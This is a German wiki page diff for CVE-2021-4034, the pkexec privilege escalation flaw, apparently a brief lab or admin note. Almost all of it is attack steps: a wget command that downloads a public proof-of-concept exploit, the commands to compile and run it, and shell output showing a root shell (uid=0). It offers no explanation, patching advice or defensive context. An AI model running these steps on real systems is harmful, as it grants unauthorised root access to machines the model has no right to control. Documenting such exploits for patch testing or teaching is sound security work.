Cve-2021-4034: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
(Die Seite wurde neu angelegt: „=Link= *https://github.com/arthepsy/CVE-2021-4034 =Code= *wget https://raw.githubusercontent.com/arthepsy/CVE-2021-4034/main/cve-2021-4034-poc.c“) |
(→Code) |
||
| Zeile 3: | Zeile 3: | ||
=Code= | =Code= | ||
*wget https://raw.githubusercontent.com/arthepsy/CVE-2021-4034/main/cve-2021-4034-poc.c | *wget https://raw.githubusercontent.com/arthepsy/CVE-2021-4034/main/cve-2021-4034-poc.c | ||
| + | xinux@elrond:~$ | ||
| + | xinux@elrond:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc | ||
| + | xinux@elrond:~$ ./cve-2021-4034-poc | ||
| + | # id | ||
| + | uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare),120(sambashare),1000(xinux) | ||
| + | # | ||
Version vom 27. Januar 2022, 14:36 Uhr
Link
Code
xinux@elrond:~$ xinux@elrond:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc xinux@elrond:~$ ./cve-2021-4034-poc
- id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare),120(sambashare),1000(xinux)